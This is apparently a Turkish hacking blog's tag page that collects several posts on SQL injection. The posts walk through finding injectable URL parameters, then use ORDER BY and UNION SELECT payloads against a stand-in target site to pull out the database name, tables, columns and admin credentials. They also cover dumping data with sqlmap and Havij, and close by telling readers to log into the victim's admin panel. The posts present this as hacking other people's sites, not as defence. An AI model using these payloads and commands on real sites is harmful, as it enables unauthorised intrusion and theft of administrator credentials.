Sql İnjection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Sql İnjection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

5-)Manuel Sql İnjection

Manuel Sql İnjection,sql injection,gelişmiş sql injection,manuel sql enjeksiyon,elle sql hack,hack,sql.



Arkadaşlar bu konuyu çok özenle hazırladım her kodu sizin için açıkladım bu yüzden full yazı yazdım işin mantığı için okuyun. Ve takıldığınız yeri yorumda sorun lütfen.

Arkadaşlar sql injection hack yapacaksanız eğer size sadece manuel sql öneririm çünkü programı yazan kişide bir insandır ve o programlarda bizim burada çalıştıracağımız kodları çalıştırıyor.

Ama o programları yazan kişiler sql hakkında baya bilgili kişiler olduğu için manuel sql size onların programından daha etkisiz gelebilir.Ama öyle değildir ileri düzey düşüneceğiz ve "ileri düzey sql injection" ile o programların çekemediği bilgileri çekeceğiz.

öncelikle sitemizde sql injection açığının olduğundan emin olmalıyız.
bkz. Elle(manuel) Sql Açığı Tespit Etme

site: hedefsite.com/index.php?id=1 


order by 1 diyoruz ve "1" i sırayla arttırıyoruz mesela diyelim order by 8 yaptık site normal açıldı ama order by 9 yapınca bozulduysa bu sitede 8 tane kolon vardır.


hedefsite.com/index.php?id=1 order by 1



ardından union select 1,2,3,4,5,6,7,8 --> 8 kolon olduğu için 8'e kadar.
böyle yapınca ekrana bakıyoruz herhangi bir sayı arıyoruz bu sitede 2 sayısı yansıdı o zaman sql komutlarını 2 sayısını silip orada çalıştırabiliriz.


hedefsite.com/index.php?id=1union select 1,2,3,4,5,6,7,8

union select 1,Database(),3,4,5,6,7,8 bu sitemizin database ismi :)

hedefsite.com/index.php?id=1 union select 1,Database(),3,4,5,6,7,8

union select 1,version(),3,4,5,6,7,8 buda sitenin versiyonu eğer 5 ve üstü ise bu kodları çalıştıracağız ama eğer 4 ise hiç ugrasmayın :)




union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables --> "information_schema" her sitede bulunur bizim db ye ulaşmamızı sağlar. bu kod ile tabloları istedik


hedefsite.com/index.php?id=1 union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables



union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns bu kod ile kolonları istedik


hedefsite.com/index.php?id=1 union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns
union select 1,kolon adı,3,4,5,6,7,8 from tablo adı admin bilgilerinin olduğu tablodan kolonları yansıtmasını istedik :) ve admin username ve password :)






























spacer

2-)Sql injection



Önce şu makalemi okumanız gerek ;) Elle(manuel) Sql Açığı Tespit Etme

sonrada şunu :) konuyu anlamanız için Veritabanı(Database) Nedir??
Arkadaşlar varya bu açık görüp görebileceniz hem çok hemde etkili bir numaralı açıktır.


Bu açık sayesinde

- Site içerisinde sql komutları çalıştırabileceksiniz.
- Veritabanından admin bilgilerini alabilirsiniz.(sql komutları sayesinde)
- Siteye Herhangi bir dosya çekebilirsiniz.
- Admin dışında site ilgili tüm bilgileri alabilirsiniz..(sql komutları sayesinde)

Bu açık ile bir siteyi hacklemek için 2 yol var.

1.Mevcut programlar 
2.Manuel(el ile)

El ile yaparsanız bilmeniz gereken sql komutları vardır ve en kesin sonuçları bu şekilde alırsınız çünkü önemli siteler programlar ile bypass(aşılması gereken engelleri aşmaya deniyor) edilemiyor.


1.Mevcut programlar 
A.Havij ile Sql İnjection
B. Sqlmap ile sql injection
spacer

4-)Sqlmap ile sql injection

Sqlmap...
Bu python diliyle yazılmış olan aracı kullanarak Sql injection yaparken hem pro olarak hemde kolay bir şekilde sitelerin bilgilerini çekebileceksiniz.

Fakat bilmeniz gereken bazı sqlmap kodları vardır bunları ezberlemek kolaydır ben mantıklı anlatmaya çalışacağım bu yüzden kolay ezberleyeceksiniz.

1-sql injection yaparken önce database ismini bulacaksınız.
2-Admin bilgilerinin bulunduğu tablo ismini bulacaksınız
3-Admin bilgilerinin bulunduğu kolonu bulup 
Bilgileri isteyeceğiz.Sıralama Database>tablo>kolon.

İşte kodları yazarkende aynı bu şekilde isteyceğiz.Başlayalım.

Ben kali linux kullandığım için biraz farklı görünebilir ama kodlar aynıdır tek fark siz sqlmap.py yazarak çalıştıracaksınız komut yazarken.

sqlmap -u site --dbs (databaseismini istiyoruz)
sqlmap -u site -D dbismi --tables (bulduğumuz db ismini yazıp tabloyu istiyoruz)
sqlmap -u site -D dbismi -T tabloismi --columns (kolon)
sqlmap -u site -D dbismi -T tabloismi -C colonismi --dump (ve bilgiler)

örnek..)






















spacer

1- Elle(manuel) Sql Açığı Tespit Etme

Arkadaşlar uzatmak istemiyorum her zamanki gibi...

Bakın hedef aldığınız siteye girip adreste http://www.hedefsite.com/php?id=1 gibi bir adres arayın
sayı ( 1 ) değişebilir"php" yazısı değişebilir farklı şeyler olabilir yani oralarda.

Böyle bir adres buldunuz. Sonra http://www.hedefsite.com/php?id=1' yapın yani sonuna bir tırnak atın ve siteye bakın her hangi bir değişim olmuşsa ve sql hatası verirse açık vardır.


Bazı arkadaslarım bana site atıyordu sitede sql hatası var, bana diyor ki bu sitede sql injection açığı var. Arkadaşlar bakın sitedeki herhangi bir hata sql açığı olduğunu göstermez eğer biz ' koyduktan sonra sql hatası veya sayfada herhangi  bir değişim oluyorsa açık mevcuttur. Eğer sitenin orjinali bozuksa bu sql injection olduğunu kanıtlamaz.


sql hatası dediğim şunun gibi

you have an error in your sql syntax



spacer

3-) Havij ile Sql İnjection





Arkadaşlar merhaba  sql injection bir çok şekilde mümkün şuan size 1. yolu göstereyim
bkz. sql injection




sql-injection-havij
sql-injection-havij 


Tables diyoruz karşımıza database ismi çıkacak hiçbir şeye karışmadan Get Tables
Ardından yöneticiye ait veritabanındaki bilgiler çıkacak bunlara "tablo" diyoruz


sql-injection-havij 


şu gördüğünüz 4 ü tablo şimdide kolonları istiyoruz. isimler saçma ama napalım :)


sql-injection-havij
 

evet yöneticiye ait şifre ve kullanıcı adı. Get Data verileri göster diyoruz.


sql-injection-havij



 Haydi kolay gelsin bundan sonrası admin panelini bulup bu bilgilerle giriş yapmak.

CuLLeN_s den bu kadar


spacer